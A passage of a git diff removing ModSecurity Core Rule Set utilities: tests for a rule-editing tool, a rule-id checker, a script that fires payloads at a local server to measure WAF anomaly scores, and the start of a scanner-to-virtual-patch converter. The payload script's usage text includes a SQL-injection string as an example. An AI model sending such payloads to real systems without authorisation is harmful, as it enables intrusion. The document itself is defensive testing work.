-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    t:decodeUrl"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    t:decodeUrl,\\
-    t:lower"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_append_tfunc_with_duplicate_transformation(self):
-        arguments = [
-            "--append-tfunc", "lower",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    t:lower,\\
-    t:urlDecode"
-"""
-        expected = rule_string
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_append_tfunc_in_correct_order(self):
-        arguments = [
-            "--append-tfunc", "lower",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    capture,\\
-    log:'log',\\
-    logdata:'data'"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    capture,\\
-    t:lower,\\
-    log:'log',\\
-    logdata:'data'"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_append_tfunc_with_chain(self):
-        arguments = [
-            "--append-tfunc", "lower",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    t:decodeUrl,\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx foo" \\
-        "t:decodeUrl"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    t:decodeUrl,\\
-    t:lower,\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx foo" \\
-        "t:decodeUrl,\\
-        t:lower"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_append_tfunc_skip_chain(self):
-        arguments = [
-            "--append-tfunc", "lower",
-            "--skip-chain"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    t:decodeUrl,\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx foo" \\
-        "t:decodeUrl"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    t:decodeUrl,\\
-    t:lower,\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx foo" \\
-        "t:decodeUrl"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-class TestRemoveTfunc:
-    def test_remove_tfunc_with_no_transformations(self):
-        arguments = [
-            "--remove-tfunc", "lower",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = rule_string
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_remove_tfunc_with_existing_transformations(self):
-        arguments = [
-            "--remove-tfunc", "lower",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    t:decodeUrl,\\
-    t:lower"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    t:decodeUrl"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_remove_tfunc_with_multiple_args(self):
-        arguments = [
-            "--remove-tfunc", "lower",
-            "--remove-tfunc", "decodeUrl"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    t:decodeUrl,\\
-    t:lower"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_remove_tfunc_with_chain(self):
-        arguments = [
-            "--remove-tfunc", "lower",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    t:decodeUrl,\\
-    t:lower,\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx foo" \\
-        "t:decodeUrl,\\
-        t:lower"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    t:decodeUrl,\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx foo" \\
-        "t:decodeUrl"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_remove_tfunc_skip_chain(self):
-        arguments = [
-            "--remove-tfunc", "lower",
-            "--skip-chain"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    t:decodeUrl,\\
-    t:lower,\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx foo" \\
-        "t:decodeUrl,\\
-        t:lower"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    t:decodeUrl,\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx foo" \\
-        "t:decodeUrl,\\
-        t:lower"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_remove_tfunc_retains_correct_line_numbers(self):
-        arguments = [
-            "--remove-tfunc", "lowercase"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    t:none,t:lowercase,\\
-    msg:'PHP Injection Attack: PHP Script File Upload Found'"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    t:none,\\
-    msg:'PHP Injection Attack: PHP Script File Upload Found'"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
diff --git a/util/rule_ctl/tests/rule_ctl_variables_test.py b/util/rule_ctl/tests/rule_ctl_variables_test.py
deleted file mode 100644
index 48923aaf5..000000000
--- a/util/rule_ctl/tests/rule_ctl_variables_test.py
+++ /dev/null
@@ -1,327 +0,0 @@
-from .helpers import *
-
-class TestAppendVariable:
-    def test_append_variable_with_one_variable(self):
-        arguments = [
-            "--append-variable", "XML",
-        ]
-        rule_string = """
-SecRule ARGS "@rx foo" "id:12"
-"""
-        expected = """
-SecRule ARGS|XML "@rx foo" "id:12"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_append_variable_with_existing_variables(self):
-        arguments = [
-            "--append-variable", "XML",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" "id:12"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_append_variable_with_duplicate_variable(self):
-        arguments = [
-            "--append-variable", "XML",
-        ]
-        rule_string = """
-SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = rule_string
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_append_variable_with_multiple_args(self):
-        arguments = [
-            "--append-variable", "XML",
-            "--append-variable", "DURATION",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar|XML|DURATION "@rx foo" "id:12"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_append_variable_with_chain(self):
-        arguments = [
-            "--append-variable", "XML",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" "id:12,chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_append_variable_skip_chain(self):
-        arguments = [
-            "--append-variable", "XML",
-            "--skip-chain"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" "id:12,chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-class TestRemoveVariable:
-    def test_remove_variable_with_no_variable(self):
-        arguments = [
-            "--remove-variable", "XML",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = rule_string
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_remove_variable_with_existing_variable(self):
-        arguments = [
-            "--remove-variable", "XML",
-        ]
-        rule_string = """
-SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_remove_variable_with_multiple_args(self):
-        arguments = [
-            "--remove-variable", "XML",
-            "--remove-variable", "DURATION",
-        ]
-        rule_string = """
-SecRule ARGS|XML|ARGS:foo|DURATION|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_remove_variable_with_chain(self):
-        arguments = [
-            "--remove-variable", "XML",
-        ]
-        rule_string = """
-SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain"
-
-    SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_remove_variable_skip_chain(self):
-        arguments = [
-            "--remove-variable", "XML",
-            "--skip-chain"
-        ]
-        rule_string = """
-SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain"
-
-    SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain"
-
-    SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-class TestReplaceVariable:
-    def test_replace_variable_name_with_no_variable(self):
-        arguments = [
-            "--replace-variable", "XML,DURATION",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = rule_string
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_replace_variable_name_with_existing_variable(self):
-        arguments = [
-            "--replace-variable", "XML,DURATION",
-        ]
-        rule_string = """
-SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = """
-SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_replace_variable_name_with_multiple_args(self):
-        arguments = [
-            "--replace-variable", "XML,ARGS:xml",
-            "--replace-variable", "DURATION,ARGS:duration",
-        ]
-        rule_string = """
-SecRule ARGS|XML|ARGS:foo|DURATION|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = """
-SecRule ARGS|ARGS:xml|ARGS:foo|ARGS:duration|!ARGS:bar "@rx foo" "id:12"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_replace_variable_name_with_chain(self):
-        arguments = [
-            "--replace-variable", "XML,DURATION",
-        ]
-        rule_string = """
-SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain"
-
-    SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo"
-"""
-        expected = """
-SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain"
-
-    SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_replace_variable_name_skip_chain(self):
-        arguments = [
-            "--replace-variable", "XML,DURATION",
-            "--skip-chain"
-        ]
-        rule_string = """
-SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain"
-
-    SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo"
-"""
-        expected = """
-SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain"
-
-    SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_replace_variable_with_no_variable(self):
-        arguments = [
-            "--replace-variable", "XML,DURATION",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = rule_string
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_replace_variable_with_existing_variable(self):
-        arguments = [
-            "--replace-variable", "XML,!DURATION:half-life",
-        ]
-        rule_string = """
-SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = """
-SecRule ARGS|!DURATION:half-life|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_replace_variable_with_multiple_args(self):
-        arguments = [
-            "--replace-variable", "&XML,ARGS:xml",
-            "--replace-variable", "!DURATION:half-life,ARGS:duration",
-        ]
-        rule_string = """
-SecRule ARGS|&XML|ARGS:foo|!DURATION:half-life|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = """
-SecRule ARGS|ARGS:xml|ARGS:foo|ARGS:duration|!ARGS:bar "@rx foo" "id:12"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_replace_variable_with_chain(self):
-        arguments = [
-            "--replace-variable", "!XML:'lisa',&DURATION:\"bart\"",
-        ]
-        rule_string = """
-SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain"
-
-    SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo"
-"""
-        expected = """
-SecRule ARGS|&DURATION:\"bart\"|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain"
-
-    SecRule ARGS|&DURATION:\"bart\"|ARGS:foo|!ARGS:bar "@rx foo"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_replace_variable_skip_chain(self):
-        arguments = [
-            "--replace-variable", "!XML:'lisa',&DURATION:\"bart\"",
-            "--skip-chain"
-        ]
-        rule_string = """
-SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain"
-
-    SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo"
-"""
-        expected = """
-SecRule ARGS|&DURATION:\"bart\"|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain"
-
-    SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
diff --git a/util/send-payload-pls.sh b/util/send-payload-pls.sh
deleted file mode 100755
index 168736a0b..000000000
--- a/util/send-payload-pls.sh
+++ /dev/null
@@ -1,171 +0,0 @@
-#!/bin/bash
-#
-# Script to post a payload against a local webserver at each paranoia level.
-#
-# Note: Webserver has to be prepared to take desired PL as Request Header "PL".
-#
-# WARNING: Setting the paranoia level using a header without proper
-# authentication and authorization is extremely dangerous, and is not
-# recommended for production.
-#
-# Check how to use the Christian Folini's Apache access log format at:
-# https://www.netnea.com/cms/apache-tutorial-5_extending-access-log/
-#
-# LogFormat "%h %{GEOIP_COUNTRY_CODE}e %u [%{%Y-%m-%d %H:%M:%S}t.%{usec_frac}t] \"%r\" %>s %b \
-# \"%{Referer}i\" \"%{User-Agent}i\" \"%{Content-Type}i\" %{remote}p %v %A %p %R \
-# %{BALANCER_WORKER_ROUTE}e %X \"%{cookie}n\" %{UNIQUE_ID}e %{SSL_PROTOCOL}x %{SSL_CIPHER}x \
-# %I %O %{ratio}n%% %D %{ModSecTimeIn}e %{ApplicationTime}e %{ModSecTimeOut}e \
-# %{ModSecAnomalyScoreInPLs}e %{ModSecAnomalyScoreOutPLs}e \
-# %{ModSecAnomalyScoreIn}e %{ModSecAnomalyScoreOut}e" extended
-#
-# This script assumes %{ModSecAnomalyScoreIn}e is the column before to last in
-# the access log, if this does not match your LogFormat the script won't work
-# For better results set the SecDefaultAction to 'pass'.
-#
-# The anomaly score envvar can be set as follows:
-# SecAction "id:90101,phase:5,pass,nolog,\
-#     setenv:ModSecAnomalyScoreIn=%{TX.blocking_inbound_anomaly_score}"
-#
-# Sample rule to setup the PL dynamically from localhost"
-# SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,192.168.0.128" \
-#     "id:90102,phase:1,pass,capture,log,auditlog,\
-#     msg:'Setting engine to PL%{matched_var}',chain"
-#     SecRule REQUEST_HEADERS:PL "@rx ([1-4])" \
-#         "setvar:'tx.detection_paranoia_level=%{matched_var}'"
-
-# Path to CRS rule set and local files
-CRS="/usr/share/modsecurity-crs/rules"
-accesslog="/apache/logs/access.log"
-errorlog="/apache/logs/error.log"
-URL="localhost:40080"
-protocol="http"
-while [[ $# > 0 ]]
-do
-    case "$1" in
-        -c|--crs)
-            CRS="$2"
-            shift
-            ;;
-        -a|--access)
-            accesslog="$2"
-            shift
-            ;;
-        -e|--error)
-            errorlog="$2"
-            shift
-            ;;
-        -u|--url)
-            URL="$2"
-            shift
-            ;;
-        -r|--resolve)
-            resolve="$2"
-            resolve="--resolve $resolve"
-            shift
-            ;;
-        --protocol)
-            protocol="$2"
-            shift
-            ;;
-        -P|--payload)
-            PAYLOAD="$2"
-            shift
-            ;;
-        -h|--help)
-            echo "Usage:"
-            echo " --access \"/apache/logs/access.log\""
-            echo " --error \"/apache/logs/error.log\""
-            echo " --crs \"/usr/share/modsecurity-crs/rules\""
-            echo " --url \"localhost:40080\""
-            echo " --resolve \"someservername:40080:localhost\""
-            echo " --protocol \"https\""
-            echo " --payload \"/tmp/payload\""
-            echo " --help"
-            exit 1
-            ;;
-    esac
-    shift
-done
-
-echo "Using CRS: $CRS"
-echo "Using accesslog: $accesslog"
-echo "Using errorlog: $errorlog"
-echo "Using URL: $URL"
-echo "Using protocol: $protocol"
-
-if [ -z "${PAYLOAD+x}" ]; then
-    echo "Please submit valid payload file as parameter. This is fatal. Aborting."
-    $0 -h
-    echo "Examples:"
-    echo "  ./send-payload-pls.sh -a /logs/test/access.log \
-        -e /logs/test/error.log -u test.test.test.com:6443 --protocol https \
-        --payload /tmp/payload --resolve test.test.test.com:6443:192.168.0.128"
-    echo "  ./send-payload-pls.sh -a /logs/test/access.log \
-        -e /logs/test/error.log -u test.test.test.com:6443 --protocol https \
-        --payload 'or 1=1;--' --resolve test.test.test.com:6443:192.168.0.128"
-    exit 1
-fi
-
-# URL of web server
-
-# Rules per Paranoia level
-# Paranoia level 1 rules, rule 012 is the delimiter of the start of PL1
-# Paranoia level 1 rules, rule 013 is the delimiter of the end of PL1
-PL1=$(awk "/012,phase:2/,/013,phase:1/" $CRS/*.conf |egrep -v "(012|013),phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,')
-
-# Paranoia level 2 rules, rule 014 is the delimiter of the start of PL2
-# Paranoia level 2 rules, rule 015 is the delimiter of the end of PL2
-PL2=$(awk "/014,phase:2/,/015,phase:1/" $CRS/*.conf |egrep -v "(014|015),phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,')
-
-# Paranoia level 3 rules, rule 016 is the delimiter of the start of PL3
-# Paranoia level 3 rules, rule 017 is the delimiter of the end of PL3
-PL3=$(awk "/016,phase:2/,/017,phase:1/" $CRS/*.conf |egrep -v "(016|017),phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,')
-
-# Paranoia level 4 rules, rule 018 is the delimiter of the start of PL4
-# Paranoia level 4 rules, "Paranoia Levels Finished" delimiter of the end of PL4
-PL4=$(awk "/018,phase:2/,/Paranoia Levels Finished/" $CRS/*.conf |egrep -v "018,phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,')
-
-echo "Sending the following payload at multiple paranoia levels: $PAYLOAD"
-echo
-
-for PL in 1 2 3 4; do
-    echo "--- Paranoia Level $PL ---"
-    echo
-    if [ -f "$PAYLOAD" ]; then
-        curl $protocol://$URL $resolve -k --data-binary "@$PAYLOAD" -H "PL: $PL" -o /dev/null -s
-    else
-        curl $protocol://$URL $resolve -k -d "$PAYLOAD" -H "PL: $PL" -o /dev/null -s
-    fi
-
-    # Here are three ways to get the transaction unique id,
-    # the first one is Christian's format, second is Spartan's format,
-    # and the third one tries to guess which is the unique id using a
-    # regular expression, the first two require specific format.
-    # The automatic format detection may cause the script to malfunction.
-    # Uncomment only the required format.
-    # To use Christian's accesslog format uncomment the following line
-    #uniq_id=$(tail -1 $accesslog | cut -d\" -f11 | cut -b2-26)
-
-    # To use Spartan's accesslog format (21 col) uncomment the following line
-    #uniq_id=$(tail -1 $accesslog | awk '{print $21}')
-
-    # To use the automatic unique_id detection uncomment the following line
-    uniq_id=$(tail -1 $accesslog | egrep -o '\b[a-zA-Z0-9_-]{26,28}\b')
-
-    echo "Tracking unique id: $uniq_id"
-
-    grep $uniq_id $errorlog | sed -e "s/.*\[id \"//" -e "s/\(......\).*\[msg \"/\1 /" -e "s/\"\].*//" -e "s/(Total .*/(Total ...) .../" -e "s/Inbound and Outbound Score: [0-9]* [0-9]*/Inbound and Outbound Score: .../" | sed -e "s/$PL1/& PL1/" -e "s/$PL2/& PL2/" -e "s/$PL3/& PL3/ " -e "s/$PL4/& PL4/" | sort -k2 | sed -r "s/^([0-9]+)$/\1 FOREIGN RULE NOT IN CRS/"
-
-    echo
-    echo -n "Total Inbound Score: "
-
-    # Here are two ways to get the transaction anomaly score,
-    # the first one is Christian's format, second is Spartan's format
-    # To use Christian's accesslog format uncomment the following line
-    tail -1 $accesslog | cut -d\" -f11 | cut -d\  -f14 | tr "-" "0"
-
-    # To use Spartan's accesslog format (21 col) uncomment the following line
-    # To use a different column change the $NF value, e.g. $(NF-1)
-    #tail -1 $accesslog | awk '{print $NF}' | tr "-" "0"
-    echo
-done
diff --git a/util/verify.rb b/util/verify.rb
deleted file mode 100755
index 6619fcbc5..000000000
--- a/util/verify.rb
+++ /dev/null
@@ -1,117 +0,0 @@
-#!/usr/bin/env ruby
-# -*- coding: utf-8 -*-
-#
-# Copyright © 2012 Diego Elio Pettenò <flameeyes@flameeyes.eu>
-#
-# Permission to use, copy, modify, and distribute this software for any
-# purpose with or without fee is hereby granted, provided that the above
-# copyright notice and this permission notice appear in all copies.
-#
-# THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SOFTWARE CONSORTIUM DISCLAIMS
-# ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES
-# OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL INTERNET SOFTWARE
-# CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL
-# DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR
-# PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
-# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS
-# SOFTWARE.
-
-require 'set'
-
-seen_ids = Set.new
-res = 0
-
-# read reserved id range from the id-range file so that it can be
-# configured on a per-repository basis.
-range = Range.new(*File.read('id-range').rstrip.split('-').map(&:to_i))
-
-# open all the rule files
-Dir.chdir("../")
-Dir["**/*.conf"].each do |rulefile|
-  # read the content
-  content = File.read(rulefile)
-
-  lineno = 0
-  this_chained = next_chained = false
-  prevline = nil
-
-  # for each line in the rule file
-  content.each_line do |line|
-    lineno += 1
-
-    # handle continuation lines
-    line = (prevline + line) unless prevline.nil?
-
-    # remove comments
-    line.gsub!(/^([^'"]|'[^']+'|"[^"]+")#.*/) { $1 }
-
-    if line =~ /\\\n$/
-      prevline = line.gsub(/\\\n/, '')
-      next
-    else
-      prevline = nil
-    end
-
-    # skip if it's an empty line (this also skip comment-only lines)
-    next if line =~ /(?:^\s+$|^#)/
-
-    this_chained = next_chained
-    next_chained = false
-
-    # split the directive in its components, considering quoted strings
-    directive = line.scan(/([^'"\s][^\s]*[^'"\s]|'(?:[^']|\\')*[^\\]'|"(?:[^"]|\\")*[^\\]")(?:\s+|$)/).flatten
-    directive.map! do |piece|
-      # then make sure to split the quoting out of the quoted strings
-      (piece[0] == '"' || piece[0] == "'") ? piece[1..-2] : piece
-    end
-
-    # skip if it's not a SecRule or SecAction
-    case directive[0]
-    when "SecRule"
-      rawrule = directive[3]
-    when "SecAction"
-      rawrule = directive[1]
-    else
-      next
-    end
-
-    # get the rule and split in its components
-    rule = (rawrule || "").gsub(/(?:^"|"$)/, '').split(/\s*,\s*/)
-
-    if rule.include?("chain")
-      next_chained = true
-    end
-
-    ids = rule.find_all { |piece| piece =~ /^id:/ }
-    if ids.size > 1
-      $stderr.puts "#{rulefile}:#{lineno} rule with multiple ids"
-      next
-    elsif ids.size == 0
-      id = nil
-    else
-      id = ids[0].sub(/^id:/, '').gsub(/(?:^'|'$)/, '').to_i
-    end
-
-    if this_chained
-      unless id.nil?
-        $stderr.puts "#{rulefile}:#{lineno} chained rule with id"
-        res = 1
-      end
-      next
-    elsif id.nil?
-      $stderr.puts "#{rulefile}:#{lineno} rule missing id (#{rule.join(',')})"
-      res = 1
-      next
-    elsif ! range.include?(id)
-      $stderr.puts "#{rulefile}:#{lineno} rule with id #{id} outside of reserved range #{range}"
-      res = 1
-    elsif seen_ids.include?(id)
-      $stderr.puts "#{rulefile}:#{lineno} rule with duplicated id #{id}"
-      res = 1
-    end
-
-    seen_ids << id
-  end
-end
-
-exit res
diff --git a/util/virtual-patching/arachni2modsec.pl b/util/virtual-patching/arachni2modsec.pl
deleted file mode 100755
index 9b6a3c256..000000000
--- a/util/virtual-patching/arachni2modsec.pl
+++ /dev/null
@@ -1,318 +0,0 @@
-#!/opt/local/bin/perl -T
-
-#############################################
-# -=[ Virtual Patching Converter Script ]=- #
-#       Converts arachni XML Output          #
-#    https://github.com/Zapotek/arachni     #
-#                                           #
-#           arachni2modsec.pl               #
-#             Version: 1.0                  #
-#                                           #
-#            Copyright 2011                 #
-#   Trustwave's SpiderLabs Research Team    #
-#           www.trustwave.com               #
-#                                           #
-#   Based On Code Originally Created by:    #
-#            The Denim Group                #
-#          www.denimgroup.com               #
-#############################################
-
-use XML::Smart;
-use Switch;
-use Data::Types qw(:all);
-use Data::Validate::URI qw(is_uri);
-use Getopt::Std;
-use Acme::Comment type=>'C++', one_line=>1; #Block commenting, can be removed later
-
-#############
-# Variables #
-#############
-
-# [Configuration Vars]
-my %param;
-getopt("f",\%param);
-$filename = $param{f};
-my $all_vulnerabilities_filename = "$filename";
-
-unless ($filename) {
-    print "Flag:\n\n\t -f:\t path to arachni xml report file\nUsage:\n\n\t./arachni2modsec.pl -f ./arachni_report.xml\n\n";
-    exit;
-}
-
-
-my $modsec_rules_file = "./modsecurity_crs_48_virtual_patches.conf";
-
-# [End Config Vars]
-
-my $VULN_CLASS_XSS = "Cross-Site Scripting (XSS)";
-my $VULN_CLASS_SQLI = "SQL Injection";
-my $VULN_CLASS_BLIND_SQLI = "Blind SQL Injection";
-my $VULN_CLASS_LFI = "Path Traversal";
-my $VULN_CLASS_RFI = "Remote file inclusion";
-my $VULN_CLASS_HTTPRS = "Response splitting";
-
-# Only the vulnerabilities in this array will have
-# rules generated for them.
-my @supported_vulns = ($VULN_CLASS_XSS, $VULN_CLASS_SQLI, $VULN_CLASS_BLIND_SQLI, $VULN_CLASS_LFI, $VULN_CLASS_RFI, $VULN_CLASS_HTTPRS);
-
-my $num_rules_generated=0;
-my $num_not_supported=0;
-my $num_bad_urls=0;
-
-my $wait_for_keypress=1;
-my $request_failed=0;
-
-my $all_vulns_xml;
-my @type;
-my @id;
-my $vuln_count;
-
-my $num_attacks_flag=0;
